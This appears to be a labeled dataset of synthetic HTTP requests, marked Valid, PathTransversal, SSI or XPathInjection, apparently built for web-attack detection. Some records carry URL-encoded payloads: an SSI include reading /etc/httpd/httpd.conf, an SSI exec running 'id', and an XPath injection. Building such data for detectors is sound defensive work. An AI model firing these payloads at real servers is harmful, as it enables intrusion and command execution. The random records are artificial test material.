If-Range: Fri, 11 Jan 08 08:22:22 CET
Max-Forwards: 9
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic dGZsNDR0OnhlbHRoaG9M
Range: 60-,-239
Referer: http://www.ctnae7Y.be/enRht/stbtd/EaoENd.rar
TE: trailers,trailers
Trailer: Host
User-Agent: 7eiesNlo (dIENK90CN; sws9@q@j; 6Usx3h7Sq; o2wAvIxK_c; kUwo21pk.)
UA-CPU: 68000
UA-Disp: 932,6777,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 0370x8472
Via: HTTP/2.2 164.82.132.76, 3.2 www.tctEh.jpeg, 0.9 www.w1tocJe.gif
Transfer-Encoding: compress
Upgrade: aooeh/2.6
Warning: 004 www.qaG5rro.jpeg "9mp7el34osnrooE0a" "Sat, 23 Aug 08 06:38:14 CET"
X-Forwarded-For: 199.4.112.189
X-Serial-Number: 1202547378477429523
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9587
Start - Id: 8350
class: Valid
GET /lVEgtpHljtrGKP/orYl6r-AD/tnChIUhaMrC4/cer/ntemtattmr/4@qhhdBfJJucXM/gOPd/fjuUoJ1wG.pl?wre06=Co3edheseaw8nahd&ive0mnanen=r%3B%3Dtoietee2od0&sanaerorttsNV=t91wXPsb4 HTTP/1.1
Host: www.tzfHn1ie.gov
Connection: tromn
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: deflate;q=0.0, deflate;q=0.3, gzip, compress, compress
Accept-Language: *
Cache-Control: no-store
Client-ip: 128.143.217.183
Cookie: qjcememcqsaes=ob@S;o9a1nnsl=51;etumzeilO=39072;ihr=ibsrC5ju;hcixSler=ioaMofTqsyt
Cookie2: $Version="5"
Date: Mon, 24 May 04 18:47:32 UTC
ETag: W/"W_nuvRHj9UeeRBCgv5X"
Expect: in2fen
From: nssg@6rneleSr.gov
If-Modified-Since: Sun, 06 Apr 08 18:53:50 UTC
If-Unmodified-Since: Wed, 06 Jun 07 04:15:24 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 23 Oct 06 15:26:10 UTC
Max-Forwards: 75
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: b5yes eadxakvc=hhuta
Authorization: Digest nonce
Range: -2465,620-
Referer: /phsLNroZ/tsfdr/r3htws/eocasP.msf
TE: gzip,chunked;q=0.0
Trailer: Upgrade
User-Agent: fhDetiie5lredlrybgsa
UA-CPU: PowerPC
UA-Disp: 7385,2765,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 569x015
Via: 2.7 www.ll6a945.html, 4.1 192.32.113.73, 0.7 127.239.235.17
Transfer-Encoding: deflate
Upgrade: o3ee/6.3, yidAr/4.8
Warning: 526 www.ahek9yac.jpeg "jci7bz7oomjz9Tife7d" "Sat, 04 Feb 06 10:55:02 GMT"
X-Forwarded-For: 217.157.80.139
X-Serial-Number: 482816
----: --------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 8350
Start - Id: 25117
class: Valid
GET /cUyRqa/tpQ4EwUDuI0YBCgc@TY/zLIdLwY4b263/4iEqnh9x2taNge/eN/lmr75Q/tZdi6qoihSH7/uva3gzNK4SBsk4nl5R/satio/2itoo.msf?7riu=69&pe7ro=7114&tAeYmLcYwformX=nwinntattdr HTTP/1.0
Host: 2.162.244.61
Connection: keep-alive
Accept: image/*, application/rtf, application/zip;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: deflate, compress;q=0.7
Accept-Language: t-oeIW, dtm-rwies, sl-s;q=0.9
Cache-Control: no-transform
Client-ip: 67.105.118.24
Cookie: rat=Poudi;NservicesMS5=izuCxy;vfA83SmetaK=74
Cookie2: $Version="6"
Date: Mon, 17 Nov 08 06:11:25 UTC
ETag: W/"8Qax@5ROdD2xK50WV_"
Expect: sJrh=kltenase;itik
From: hixb@siilehs.org
If-Modified-Since: Thu, 04 Feb 10 08:31:23 GMT
If-Unmodified-Since: Sat, 30 Apr 05 15:07:38 UTC
If-Match: *
If-None-Match: *
If-Range: "qVh9qY61us81VAmF"
Max-Forwards: 0
MIME-Version: 2.8
Pragma: Fo=leih
Proxy-Authorization: Basic dXQ2TWFuczowZXd0
Authorization: Basic dG9uaDY6d2xvdXNlc2U=
Range: 418-75506
Referer: /iabIrow/seeocnd/tvatir.mpeg
TE: deflate;q=0.0,trailers
Trailer: Accept-Encoding
User-Agent: sWr1QTZ http://www.dnlmfi.net
UA-CPU: x86
UA-Disp: 9555,789,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 350x680
Via: 5.2 9.164.91.32, FTP/6.3 www.AoinnDa.shtml
Transfer-Encoding: gzip
Upgrade: rle/3.1, oaatl/1.5, seeNg/9.4, nHrat/7.6, tsarti/6.4
Warning: 856 www.otgia.css "oabfnoRfoehnueGi" "Tue, 04 May 10 20:01:11 GMT"
X-Forwarded-For: 31.113.199.2
X-Serial-Number: 714579
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25117
Start - Id: 13585
class: Valid
GET /eVaPFVUAnfsGNoOZ.kHD/oKpU/ethZoyNAs8i/v@Jcat-div9eaZ/PJLVT.jpeg?TojLq=80062382&4ea9obca9lms=yxZdYauj8Q&mtecbOdotbomn=i+s0%3F8q&XH.AcD=Mva&eairo7E=9208356&toAnhoioaahi0ns=54048&nlseoagHoXtj=E+n%7C&ca4tsel0=esc0tmc%3Fxshnnne&xSgD@W@connectdc=+g&ieodT=%3EoER+ecatuc+gb%29thtiae&ecaosi4sade=173&slsoVerw=ae0s&Nhomed_r5J=f3m+t HTTP/1.1
Host: 199.183.128.231
Connection: close
Accept: */*;q=0.9
Accept-Charset: iso-8859-4, hz-gb-2312, windows-1257;q=0.6, windows-874
Accept-Encoding: compress, deflate, identity, compress;q=0.4, identity
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 134.203.218.183
Cookie: weo=zt:ie[j7e oweo wzu;1aouktriO=3;eihgta68h=ctan;oO08tts=83353;tid=heeh1bUNL(doincludeo7location;h457=twls0a
Cookie2: $Version="5"
Date: Fri, 30 Sep 05 01:05:34 GMT
ETag: "a3HvQL39fz-gv447G8"
Expect: sp4siceo
From: issst@tutqrpd.biz
If-Modified-Since: Tue, 08 Jan 08 01:58:43 GMT
If-Unmodified-Since: Sun, 03 Dec 06 11:02:10 CET
If-Match: "YcfbB-AqaOtwNjaP.n"
If-None-Match: *
If-Range: *
Max-Forwards: 20
MIME-Version: 9.3
Pragma: rh='lei'
Proxy-Authorization: Basic dGl1b3R2Om9hZWVvaVMy
Authorization: NTLM Q2Q3dHRvYWhyZnBzdmZ3d2FuaW5oZ2VvZTZzdXR0aWl0aWxz
Range: 625-
Referer: /tssrs1i/nr5g/rpepavpq.css
TE: chunked,chunked
Trailer: If-Match
User-Agent: Mozilla/6.6 (Machintosh; U; PPC 7.8; Gh-ga; rv:8.0.2) Gecko/96746189
UA-CPU: Sparc
UA-Disp: 896,6607,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 138x4900
Via: 2.0 www.qeznVeid.html, 5.4 www.gtYs.css:89826
Transfer-Encoding: identity
Upgrade: tsoo4A/5.4, a7l/6.5
Warning: 703 178.118.249.8 "oetetNse5t" "Tue, 31 Jan 06 07:52:19 UTC"
X-Forwarded-For: 170.190.112.43
X-Serial-Number: 70032554284651
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 13585
Start - Id: 29337
class: Valid
GET /esl43oV/rsaso9/estsruplrrrfapeshad/wk/d8eUVU/tan/bn.cgi?c4=9424556&zr=2oolSlaubbtibgd&shjn8=sIT-AVFM0d&phpOUUFpePde=hL9latbinSRe&oWnh2=cQAo&e57j-=37&yidiFntjenirpus=Nhwq%25ww2tmh+&sn1n=je HTTP/1.1
Host: www.GymolA.it:39060
Connection: keep-alive
Accept: text/*, text/*
Accept-Charset: windows-1250;q=0.1, x-mac-chinesesimp, iso-2022-jp, iso-10646-ucs-2;q=0.9, utf-7
Accept-Encoding: *;q=0.9
Accept-Language: glp-caainex;q=0.2, q-1euo
Cache-Control: only-if-cached
Client-ip: 152.42.80.93
Cookie: DVUPtL@.=9bYzuHv;zzBopenb9YL7lO=nodt
Cookie2: $Version="35"
Date: Sat, 17 Jul 04 23:20:48 UTC
ETag: "EVn78D_j2F_Ci2MjUfz"
Expect: dhpadts=lStoav;izatsiw=osstkat
From: yttt5iy@rcto.com
If-Modified-Since: Fri, 09 Jan 09 16:16:31 GMT
If-Unmodified-Since: Tue, 10 Apr 07 14:26:36 UTC
If-Match: "8bAs7@pemgnqiCw"
If-None-Match: *
If-Range: Fri, 11 Dec 09 22:52:43 GMT
Max-Forwards: 59
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: NTLM OXFudW1EaTl5WXN0Ym9vZG1tYXV4WDdkdGFleHlkM3Nlc2NvNW11aA==
Authorization: oyrnm eseuna=oToE
Range: -72,-9853
Referer: /eyto4o.bin
TE: gzip,deflate,deflate;q=0.0
Trailer: Host
User-Agent: Mozilla/7.0 (Windows; U; Win 9x 6.7; O8-je; rv:4.1.5) Gecko/79112979
UA-CPU: StrongARM
UA-Disp: 575,351,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7677x676
Via: HTTP/0.7 www.dttjmnsr.js, 0.7 www.m1nt.jpg:0780
Transfer-Encoding: e5sh
Upgrade: erNrnt/0.5, c2isms/4.7, 5eu4/2.1, W0yEk4/0.3
Warning: 707 229.233.88.113 "toegchfersr2gftmiE" "Sat, 27 Jan 07 13:21:51 CET"
X-Forwarded-For: 41.177.120.181
X-Serial-Number: 892680378227754
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29337
Start - Id: 35933
class: PathTransversal
GET /aCoGsdP@Dhx8w/df/r7Hf8-iRv/9ocatirasHMK7link/ooaFMloo9H/eUL5ev.1aJOXgXn8_Rt/pewnath/0or/4iimgXLL43ZVs.J/7FwK.bin?ee8x=iFy&Ebi3aeo2f2g=175474&ntnoaanfe1=83648&lsi=brgWjTvK4&5Zw0hhdwrur=d&oolLs3as0=%3C%21--+%23include+++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22--%3E&rTsore=dD48YRM&naBejmho=ll&reqnT8=wI%40GvAf0Z&6e2n6ecsst9=sNymetahsaq&ecvlou=tKWeewvhntr&lsej=7iETmH8mHdrop&ejy=%3Delie HTTP/1.0
Host: www.oompo2ha.org:80
Connection: keep-alive
Accept: text/plain, video/quicktime;q=0.0
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: A-kIwione;q=0.2, 8s-s
Cache-Control: no-store
Client-ip: 111.208.189.237
Date: Sat, 01 May 04 23:00:38 CET
ETag: W/"YdL@MxnUcp1wtpf"
From: guNijtrt@taipn3.org
If-Unmodified-Since: Thu, 17 May 07 10:00:48 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 546
Pragma: N='cn'
Proxy-Authorization: Digest cnonce="ei6idr"
Authorization: Digest nc=Fc7b56e1
Range: 2-,-884
Referer: /seaaw2AR/tH12.wmn
TE: gzip;q=0.6,chunked;q=0.2,gzip
User-Agent: Mozilla/7.7 (Machintosh; U; PPC Mac OS X 3.9; im-t0; rv:1.4.3) Gecko/94129415
Via: HTTP/8.3 www.13pn.css, 4.0 www.zane.tiff, 5.8 www.t9rd1.tiff:1
Transfer-Encoding: compress
----: ----------------------------------------

null

End - Id: 35933
Start - Id: 32322
class: Valid
GET /aoereCtHBeaee/oC@.iZ0.CLzKUdp/WkB1.LvuTAIZz/k2z8/nMLTbC9gxs5HPqT/dea_8P465P0ke0/hWbn/aootdnnekasetaeeti/r@m1_v.Opmk.jpg?2pw.=m0ldjCh7atnors3 HTTP/1.0
Host: www.rtmtnT.be:77794
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-hebrew, x-mac-greek;q=0.1, x-mac-chinesesimp;q=0.0
Accept-Encoding: *;q=0.6
Accept-Language: am3-Anf7za, y-otvse2j, lmha4i6-hsMfaead;q=0.4, yaEE-grge6h, ilsdrg-eblkuai
Cache-Control: no-transform
Client-ip: 155.74.53.10
Cookie: nhpaw=roeUrDorsdor1abg7;fNi@mlog=454943193
Cookie2: $Version="9"
Date: Thu, 08 Jan 04 10:38:08 UTC
ETag: "Kao7k1nsmjJ0uba"
Expect: 100-continue
From: uoia@eenManS.fr
If-Modified-Since: Tue, 08 Jun 04 20:11:11 UTC
If-Unmodified-Since: Fri, 12 May 06 01:15:26 UTC
If-Match: "sO-Hjpx9sJc2LcM7vl"
If-None-Match: "hPEpQ1o3r9j31l2eMcD"
If-Range: "FM6b5OzTJZdFxxGaWiV_"
Max-Forwards: 9
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest response="22F540Ff1cB74c8F64522Ac09e9adb6F"
Authorization: Basic NmxpRnJkbDplQWU2
Range: 2-941553
Referer: http://fmia0.biz/CHkrss/StlbmM5.pdf
TE: gzip;q=0.0
Trailer: Range
User-Agent: Mozilla/1.2 (Machintosh; U; Mac OS X 4.1; br-Na; rv:0.9.1) Gecko/37853959
UA-CPU: StrongARM
UA-Disp: 0557,8161,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 831x847
Via: 8.2 www.tvmd.css, 2.4 www.s1a3yot.htm, oeia/8.4 www.bqnbel.png
Transfer-Encoding: pp8eCn; xuireso=eGcc4
Upgrade: ouivo/6.7, erhhi/2.4, ofeise/1.9
Warning: 763 224.24.45.163 "cNuswem7tpeegd" 
X-Forwarded-For: 132.144.23.218
X-Serial-Number: 454901
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 32322
Start - Id: 39398
class: SSI
GET /np8@-VNr4/vbscriptTb5C7vYHN/onullQnp/v7/6jcmd.nsf?esbwrtsseG2=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&thb6ubrtAine8=5602&YmeZHexzj=797 HTTP/1.1
Host: www.0beqo.org
Connection: close
Accept: video/quicktime;q=0.1
Accept-Charset: isiri-3342, windows-1253, iso-8859-4, iso-10646-ucs-2, euc-tw;q=0.7
Accept-Encoding: deflate, deflate;q=0.5, compress, compress;q=0.4, compress
Accept-Language: *
Cache-Control: min-fresh=1513
Client-ip: 39.14.204.79
Cookie: gPtogetiro3zrmy=ialsam~ihtp L prns4R 
Cookie2: $Version="87"
Date: Sun, 15 Feb 04 09:03:49 UTC
ETag: "4Brn_CPTrEZ4KqY"
Expect: 100-continue
From: gdiexzng@dnnsS.com
If-Modified-Since: Fri, 25 Apr 08 12:14:40 UTC
If-Unmodified-Since: Wed, 28 Jun 06 03:03:52 UTC
If-Match: "PS@@C1Y8FtZUzBn"
If-None-Match: *
If-Range: "Mc.TC8Y7egqiTbA"
Max-Forwards: 500
MIME-Version: 4.0
Pragma: hph1n98=raka276c
Proxy-Authorization: reenr ueer=altyt2
Authorization: Basic bHRzaWV0dGU6bWVpcnM5
Range: 32-500
Referer: http://Ireqae.com/e5swd/tt1ih.nsf
TE: chunked,deflate,deflate;q=0.2
Trailer: Accept-Language
User-Agent: dhLpssE/3.6.3.4.1
UA-CPU: x86
UA-Disp: 939,8855,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 696x8409
Via: FTP/1.2 www.6Oem.jpg, 5.5 162.254.142.167, 5.6 224.107.105.60:8
Transfer-Encoding: compress
Upgrade: Trtet/1.3, sieet/3.4, eced/6.6, yns/9.1, snfH/3.3
Warning: 807 171.93.211.15 "9neAr" "Tue, 14 Nov 06 22:05:25 UTC"
X-Forwarded-For: 193.181.203.122
X-Serial-Number: 25787238
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39398
Start - Id: 21884
class: Valid
GET /i5w/n81Rkk6/h0MC6ISgpassthru9eval/e9/dzHZZFKb/ewT7@9Wh.dll?servicesPDDAwt=sbRrfi HTTP/1.0
Host: www.oedni8.fr:2105
Connection: drioTba
Accept: audio/*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: xcea-n, ooehyrd-8hko7lqe, rhooh-vusLc0eh
Cache-Control: max-stale
Client-ip: 77.124.253.80
Cookie: 50rLZAmeta90F=8520434;YGff8insertmetahtaccesxzj=4682
Cookie2: $Version="599"
Date: Thu, 10 May 07 18:02:01 CET
ETag: "fyqs5Qx@yMaGeCdjwq"
Expect: ohTw2=3Sm4tlko;zoeayq
From: gspde@ia3eGzume.be
If-Modified-Since: Mon, 27 Oct 08 16:58:34 CET
If-Unmodified-Since: Sat, 21 May 05 01:14:35 UTC
If-Match: *
If-None-Match: *
If-Range: "ge6XUtF4MBe.-9Z"
Max-Forwards: 98
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: iele gsycpn=cveretgu
Authorization: Basic YmdudHNhbFM6YUxlZ2RnekU=
Range: -34244,001-
Referer: /teb8ecaA/mqNd5/uRen/2tblc.asp
TE: gzip,trailers,gzip;q=0.0
Trailer: Trailer
User-Agent: oIbeow (lUKp5A; elL8SKEjAZ; tNd6X6; hJlVsmAD; tSqHkeGg)
UA-CPU: StrongARM
UA-Disp: 649,1976,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 196x452
Via: royg/6.7 95.191.140.210, Odtnn4/7.6 www.t0tla.css, 8.5 www.eLshuec.tiff
Transfer-Encoding: compress
Upgrade: cuSa/4.1, ehd/3.9, ecn/7.5
Warning: 810 48.19.38.105 "wocweaael2R4t" "Mon, 17 Nov 08 22:16:35 GMT"
X-Forwarded-For: 182.115.130.238
X-Serial-Number: 0932215457430057404
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21884
Start - Id: 39988
class: SSI
GET /ts_R_USE/aai3O8otncki0r/7rsr0zwdnt/aeacN3dscgcsu/gnB-@crIg1ZpYDj2_.d/hHCp0Q/tdvt/t3d/gi4shRet44Nhi/fwp8tiifx8aoe/aarhll/iaeTnvms.nsf?xsheR8rayRrtb4=%3C%21++%23%3C%21--+++%23exec+++++cmd%3D%22id%22--%3E&deletebodyiframey2=6465&dorh08Ioggghe=li1child&sa=%3Eo&hhlnhw=7176860&roaijan=26778&loedileHa3tdt=541896&he7t9=eirni%3Fmihitio&vrHhQhcwdivzmI=75791 HTTP/1.1
Host: 40.220.191.116:17
Connection: oteeo
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: slLk-ronn;q=0.5
Cache-Control: no-transform
Client-ip: 190.94.5.54
Cookie: khuleoeslNoy= d;hstlvetqhoemea=a l;1rlftl=8064305801;ojoudebegl5iao=aOqeifrDrRTin;bx1h2axbyN7acw5=0
Cookie2: $Version="941"
Date: Sun, 30 Mar 08 01:17:48 UTC
ETag: W/"_bPQwMT@Vkx-eIVQ"
Expect: 100-continue
From: 5iWxsCt@nr6efecsn.de
If-Modified-Since: Sat, 30 Apr 05 20:33:05 GMT
If-Unmodified-Since: Wed, 07 Jun 06 10:15:30 GMT
If-Match: "6AskQWSjUK2L0ELehe62"
If-None-Match: *
If-Range: *
Max-Forwards: 237
MIME-Version: 3.3
Pragma: 71h=sO
Proxy-Authorization: NTLM NlQ2YWhtdWl0dGR2TGxlem9OZW50dG9vaXI5VTVicmlzc2xnbm9rZW9sdGVuZWU=
Authorization: rif6 vouldi6f=5txo2
Range: 618-573,4-,461-
Referer: /nau7d.sh
TE: trailers,chunked;q=0.7
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.6 (X11; U; Unix 4.8; et-id; rv:2.1.2) Gecko/71078963
UA-CPU: Sparc
UA-Disp: 8616,110,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 860x1351
Via: FTP/9.9 www.ntaTad.shtml
Transfer-Encoding: deflate
Upgrade: ptgi/5.0, Tpaeet/6.5
Warning: 988 144.42.79.118:49591 "sspeenqeLi3zyDee" "Thu, 16 Jun 05 19:34:26 GMT"
X-Serial-Number: 754321
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39988
Start - Id: 49118
class: XPathInjection
GET /8ehhmjtrxxoEiiutim/crEv8s2a/.3OX6ba9dzJ7connect/CgDAlogwv.fLlh/nmhlsntfloupao95aasn/MrclNru/ud27teirt.dll?tbrFuast=neArenninN5noWpe&fhfe4qxma=gKtm&tnnonsopt=ttA3eyvsy&aste=nkfeTense18mlRa&2rithdie9=Orsxrwqielwr%3Fr&3CL7=17&betweenSX_=2ynarh%27+++or+deetr%2Ftsnse%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D8%5D++or+++%27ru%27++%3D+%27 HTTP/1.1
Host: 88.162.196.130
Connection: noUoQii
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-store
Client-ip: 140.0.134.125
Cookie: sUjevalAgehbetweenL=45;Oey=2h0
Cookie2: $Version="259"
Date: Wed, 03 Aug 05 15:34:40 UTC
ETag: W/"xDd@V.0G-HbolXW"
Expect: htduh=nedueein;lnyke
From: tiaecs@atrtrnsru.ch
If-Modified-Since: Sun, 22 Jul 07 01:17:13 GMT
If-Unmodified-Since: Sat, 02 Apr 05 16:06:36 UTC
If-Match: "fKYBCvbJeO8B1QXb2Q@x"
If-None-Match: "Zh@aEsWWy7n@MfvHPIZ"
If-Range: "6IbXyIqqMh60@BPT"
Max-Forwards: 819
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: bsj9 yaSet=s6ca
Authorization: Basic bXllZW50TzpsaWR1ZWN4bQ==
Range: 1-
Referer: /0hberth0/iseiS/nEtlNaa/gmyjfso.avi
TE: chunked;q=0.3,trailers,deflate;q=0.5
Trailer: Referer
User-Agent: Mozilla/1.4 (Windows; U; Win98 3.3; 1e-ya; rv:1.9.4) Gecko/95538950
UA-CPU: StrongARM
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 9298x371
Via: 9.4 105.145.37.4:8818, HTTP/3.1 67.67.54.173, 1.6 www.EasavI.png
Transfer-Encoding: identity
Upgrade: rlace/3.0, hoSa/9.4, jas/6.6, iAeed/2.7
Warning: 856 173.35.211.19 "ihersc3ga8taanoissh" 
X-Forwarded-For: 15.3.39.191
X-Serial-Number: 68685203672775561
----: -------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 49118
Start - Id: 888
class: Valid
GET /tecetrr7/ttxU9KuG/n_Hj0py/oinputt/cbzoEseBuimheuihhr/s6A2HH34fnrE@FXU/sp6iecimr0/uFstfrtrirtl9aue/nMz@08.js?Psckr=ohbhrtOeiedh6xIe&Enyrustvehs9qer=rAh-%40sH&aJuaEETcaecmte=iorruscsrAtareh&RIessoieeh=%5Du+%5Dyo&ecnA=spositionu&gqaweeaur=4&sboeN2Eo16qRt=%3Arsr%5CumeuoiinutrxRe&odoDel=izv+werotTxml3t&YetounOerWst=56&tros=r9cxeHhtex HTTP/1.0
Host: www.iioOas9oT.ch:69
Connection: uaidb
Accept: application/*, text/*;q=0.1, text/xml
Accept-Charset: *
Accept-Encoding: identity, deflate, identity;q=0.4, compress;q=0.8
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 233.93.204.250
Cookie: iIey2iracaey6G=66236256;nEio=ed;aeiloi=oBzebti
Cookie2: $Version="2"
Date: Sat, 03 Jul 04 20:46:54 UTC
ETag: "XSjeLmo19ESb18co3"
Expect: 100-continue
From: Ou2tor@taoe.fr
If-Modified-Since: Mon, 24 May 04 04:00:55 CET
If-Unmodified-Since: Thu, 20 Aug 09 18:44:49 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3768
MIME-Version: 0.0
Pragma: tgsso='osrfodai'
Proxy-Authorization: Basic ZW5lRGVhOmthbnRuUjJz
Authorization: pjriym olPtt=agdgali
Range: 03-,31-18005,845834-77348
Referer: http://www.me6Se.com/th5l7/unm3trya/etaaHgb/nkdnl/iivheotn.pdf
TE: chunked;q=0.2,gzip
Trailer: Via
User-Agent: Mozilla/3.3 (X11; U; Open BSD i586 5.7; tf-rc; rv:1.4.8) Gecko/38504857
UA-CPU: 68000
UA-Disp: 1675,0086,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 848x029
Via: HTTP/8.4 www.iqsmnd.html, 6l0rm/0.8 120.89.180.152, FTP/4.9 92.205.113.225
Transfer-Encoding: ee9is
Upgrade: qos/8.5, uhncee/1.8, heeaj/4.9, Eng9hD/1.7, teo/3.0
Warning: 739 www.M13tf.tiff "wbiCnlbr1oeamRa0" 
X-Forwarded-For: 168.48.15.93
X-Serial-Number: 510626783025324042
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 888
Start - Id: 21834
class: Valid
GET /V_sKxP1Geval/emeknisaakyu45b7e/YwheredrU3mY1EvP/Rsqoiid64Gsma/_YacGiframes@28in/e-XHsodzhWQeAc/nwnXVwv84j8j25h9ufJg.swf?ogei3sp0Esd=07770&unzerSsEwbsROLi=rtDleaem%3B+&6V0jareuov=56885885&ptnELd=7iThtpallwwgg&qOT0hq=07532821&5ria=10&5Q0-4gE@=71&8f=46875&at=%5B8zRe9iyan&sss5Je5eorTl=8200&processing-instructioncath3scriptF3sbgsoundLi5=%7E9%3D&elisia=+-c&knx=processing-instruction%3D8eanHi0a+lstdinwr&dutdnermoh=%29sock_stream%40d+&taeqjac=4 HTTP/1.0
Host: 66.234.186.196:7343
Connection: nenne
Accept: image/gif, audio/x-wav, audio/*
Accept-Charset: windows-1253;q=0.4
Accept-Encoding: compress, compress, identity;q=0.2, deflate, gzip
Accept-Language: *
Cache-Control: no-cache
Client-ip: 254.135.226.163
Cookie: 6Qfx8Z=9TGFHK68u;podlydisadnsIte=12406148;fnoiaa3tmo=6snactE;Myy0bs1ea80=itinclude4;rnYsetsqre=winntd(&yuinputec|w2
Cookie2: $Version="3"
Date: Sat, 11 Oct 08 22:15:36 UTC
ETag: W/"R5lCvqAM8NjhhWf0sjS"
Expect: ulwbiexh=aweHnnaE;siieeo
From: aiahtri8@rnlaavmnt.be
If-Modified-Since: Thu, 22 Apr 04 03:57:12 UTC
If-Unmodified-Since: Sun, 08 Feb 09 09:29:42 CET
If-Match: "9.x.zOyv4BqmBtpNK"
If-None-Match: "w5QSQl@ENc3AFzTQ"
If-Range: Thu, 25 Jun 09 10:10:30 GMT
Max-Forwards: 8404
MIME-Version: 0.1
Pragma: eoirwoi=onr
Proxy-Authorization: Digest nonce
Authorization: Basic eXR1czBlczpvcm5vb2E=
Range: 65-,335-
Referer: /M4oaOqEO/snoaaon/lszal/teuiehyb.rar
TE: trailers,gzip;q=0.8
Trailer: If-Modified-Since
User-Agent: Mozilla/1.5 (compatible; estsi; Win98; e7EosDa)
UA-CPU: x86
UA-Disp: 488,0035,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3901x4660
Via: HTTP/3.8 www.scluqo.jpeg
Transfer-Encoding: deflate
Upgrade: Aeeai/2.9
Warning: 721 www.daoejbee.jpg:03056 "gyndpceaorfoaes" "Thu, 02 Jul 09 06:04:20 UTC"
X-Forwarded-For: 113.55.233.173
X-Serial-Number: 202474
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21834
Start - Id: 21341
class: Valid
GET /V@3KiRVsn_lBxKS/escriptkAe/bcFSRuGcTajhGZHMATZ/updateK-kX/exe/eUGBAPobKQSJqYa8tdbm/dFO0ToGXD0GB4K7/Eyeirres3tjnc/sns8xd3r0durtimyin.exe?Utsht=r7l5yteIvetauhod&7oeoct9anewduk0=ra4impintoutAerheZ&ktatRirzoefb8o=790&ELjtreR=rpd%40nhotyewe&ne=of&gsm=yft5 HTTP/1.1
Host: www.Aatiehgms.ch
Connection: cpsmi5Ae
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: deflate;q=0.7, gzip;q=0.6, gzip;q=0.0
Accept-Language: memot-nhl;q=0.0, xmch-intE7, RaoC-i7;q=0.6, weio-seiaot
Cache-Control: no-transform
Client-ip: 77.98.59.51
Cookie: rxtMTag9ls=14681960;iOyia4a7A5n='hEses4af\e;pn5sgnpc8ia=05t7y8];PIimuizeshcknli=uhtsnfeahulseu;uorrAhafv27thn=m<i$g;sedeOjd=6
Cookie2: $Version="088"
Date: Sun, 29 May 05 01:43:56 UTC
ETag: "4ZoXdfDu0q2fc1O652"
Expect: 100-continue
From: ahlxburo@rectarusna.st
If-Modified-Since: Thu, 12 Jan 06 18:04:35 GMT
If-Unmodified-Since: Sun, 11 Feb 07 20:06:54 UTC
If-Match: "9fFYXKE69h_WLrA"
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 8.3
Pragma: t=gNp1ee
Proxy-Authorization: Basic aGtzc09lRTpuN2g4cw==
Authorization: NTLM bmVscTJzZWF1c3Jpb2Ruc3R3dGhlV3pFb2FhaWV0aWh0aWFtZXJldGV0czY=
Range: 7-27394,731-8,0552-
Referer: /7tji2/bfdT/ntAk.pdf
TE: gzip
Trailer: Upgrade
User-Agent: snnnnen/5.9.5.0.2
UA-CPU: 68000
UA-Disp: 7808,2249,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 040x521
Via: d3n/3.4 91.182.174.245
Transfer-Encoding: identity
Upgrade: ews/8.3
Warning: 480 www.6ge64dis.htm "TNisirlesy0eema" 
X-Forwarded-For: 86.182.5.47
